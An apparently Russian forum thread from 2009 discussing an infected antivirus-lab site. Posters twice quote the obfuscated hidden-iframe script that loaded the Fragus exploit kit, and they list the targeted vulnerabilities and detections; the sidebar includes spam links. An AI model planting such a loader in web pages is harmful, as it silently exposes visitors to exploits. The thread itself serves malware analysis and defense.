Перейти к содержанию

Recommended Posts

DVi

Не удивительно, учитывая наличие вот этого кода в центре страницы:

<script>document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');</script>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Пит

Это значит что панды в России в опасности? :blink::lol:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Мухаха!!

Реално инфекченный сайт:

<script>document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');</script>

Это iframe, ведущий на страницу с эксплоитом.

А там полно вкусностей:

MDAC

directshow

pdf - util_printf, Collab.collectEmailInfo и collab_geticon (будут заражены все у кого акробат менее чем версии 9.0 внезависимости от используемого браузера)

swf

aolwinamp

snapshot

spreadsheet -вроде в прошлый вторник майкрософт выпустил патч ;)

Собственно бинарник:

http://www.virustotal.com/ru/analisis/2c9a...e352-1250730484

на текущий момент:

http://www.virustotal.com/ru/analisis/2c9a...e352-1250777968

Pdf-ка с эксплоитом:

http://www.virustotal.com/ru/analisis/f5a4...d093-1250778731

Флешка:

http://www.virustotal.com/ru/analisis/73bc...bad9-1250780189

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Юрий Паршин

Добавили детект скрипта как Trojan-Downloader.JS.Iframe.bpe. Это для тех, кто любит отключать эвристику в WebAV)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

и еще добавлю:

Кому интересно, что это за sploit-toolkit, которым инфицируют посетителей viruslab.ru:

Тулкит называется FRAGUS, российская разработка, появилась в июле. Цена - 800$

http://evilfingers.blogspot.com/2009/08/fr...rk-in-wild.html

З.Ы. Не воспринимать как рекламу :D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Так а что будет если зайти на сайт без антивируса?

Цена - 800$

Это цена за вирус что-ли?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Motley

Ничего ровным счётом :) Я только что без антивируса заходил.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion
и еще добавлю:

Кому интересно, что это за sploit-toolkit, которым инфицируют посетителей viruslab.ru:

Тулкит называется FRAGUS, российская разработка, появилась в июле. Цена - 800$

http://evilfingers.blogspot.com/2009/08/fr...rk-in-wild.html

З.Ы. Не воспринимать как рекламу :D

по данной ссылке заражение.

+после этого вот это стало появляться:

screen.JPG

post-5672-1250787411_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Burbulator
по данной ссылке заражение.

kis2010 не видит

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion
20.08.2009 23:58:47    Вредоносный HTTP-объект <http://www.anti-crimeware.ru/exp/adjs.php?n=659423313&what=zone:3&target=_blank&exclude=,&referer=http%3A//www.anti-malware.ru/forum/index.php%3Fs%3Dcec0f04941ee8262607b77deda8f3f8b%26act%3Dpost%26do%3Dedit_post%26f%3D2%26t%3D9263%26p%3D78982%26st%****: обнаружено: вирус 'HEUR:Exploit.Script.Generic' (модификация).20.08.2009 23:52:04    Вредоносный HTTP-объект <http://evilfingers.blogs***.com/2009/08/fragus-new-botnet-framework-in-wild.html//fragus-new-botnet-framework-in-wild>: обнаружено: вирус 'HEUR:Exploit.Script.Generic' (модификация).

screen.JPG

Если ява скрипт в браузере отключаем, аллертов больше нет :)

post-5672-1250788076_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion

screen.JPG

Случайность?? Вирлаб Касперского намудрил чёта?

post-5672-1250789216_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Deja_Vu
kis2010 не видит

убрали уже пару часов назад

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion
убрали уже пару часов назад

Обновление не помогло, только откат не предыдущие <_<

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Это цена за вирус что-ли?

За эту связку эксплоитов. Бинарник, загружаемый связкой, может быть любым.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber
Это цена за вирус что-ли?

за exploit-toolkit. Троян, который заливали, где-то на порядок меньше.

Ничего ровным счётом smile.gif Я только что без антивируса заходил.

Эксплоит уже убрали и по указанному адресу на текущий момент ничего не отдается.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Motley

А вот теперь включил антивирус :)

MalWar.JPG

Page.JPG

post-4040-1250791314_thumb.jpg

post-4040-1250791456_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Это детектирование обфусцированного iframe, который вел на Fragus, пакет эксплоитов.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Дк а кто их в их сайт эту фигню впихнул? похекали шоле? B)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Skorpion

Вы используете не релизную версию.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Юрий Паршин
Skorpion

Вы используете не релизную версию.

Дополню: WKS6MP4 RC в настоящий момент обновляется с сервера tim1 - это тестовый сервер, поэтому фолсы вполне возможны - на боевые сервера эти апдейты роботом пропущены не были.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • PR55.RP55
      Отслеживание активности любого расширения в браузере на примере хрома: Chrome https://xakep.ru/2014/06/16/62643/ Таким образом можно выявить левое расширение. т.е.  хорошо бы отслеживать активность расширений и прописывать данные в Инфо.
    • SemenovaI
      Отзывы читать надо путешественников и уже согласно их мнению ехать отдыхать. Мы так с мужем в Болгарию летом съездили, сначала я изучила впечатления туристов об отелях, кафе и уже тогда выбрала маршрут и забронировала гостиницу. На Букинг зайдите там много всего интересного почитать можно. Кстати, бронировала отель используя кэшбэк https://letyshops.com/shops/bookingcom мне понравилось. Недорого так заплатила за номер, который сняли на пару недель. 
    • Зотов Тимур
      Ой, понимаю, банька это сила. Тоже на даче хочу построить, а то так понравилось отдыхать с мужиками, с пивком и девочками http://prostitutkichelyabinskaxxx.com/ , после горячего отдыха еще и в бассейн прыгнуть... Красота.
    • demkd
      это просто id задачи в кэше он будет виден только в ссылках или не будет виден, я уже не помню, в любом случае оно не представляет интереса.
    • PR55.RP55
      В теме к сожалению работали с устаревшими версиями uVS .4.0 В uVS  запись: C:\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE C:\WINDOWS\SYSTEM32\TASKS\{B3F8DFD8-6BC7-3786-4E00-E03FE910D91A} ------------ В FRST запись: Task: {0EA205A7-5227-418F-A262-BBF8FD9349B0} - System32\Tasks\{B3F8DFD8-6BC7-3786-4E00-E03FE910D91A} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://nbsallastar.com/cl/?guid=y92wjhgqs5boj6xi0hl7thkb6nfjreyg&prid=1&pid=4_1106_0 {0EA205A7-5227-418F-A262-BBF8FD9349B0}  - нет {B3F8DFD8-6BC7-3786-4E00-E03FE910D91A}  - есть Да, актуальная версия должна бы это увидеть. Из Fixlog "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0EA205A7-5227-418F-A262-BBF8FD9349B0}" => removed successfully
      "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0EA205A7-5227-418F-A262-BBF8FD9349B0}" => removed successfully
      C:\Windows\System32\Tasks\{B3F8DFD8-6BC7-3786-4E00-E03FE910D91A} => moved successfully
      "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{B3F8DFD8-6BC7-3786-4E00-E03FE910D91A}" => removed successfully
×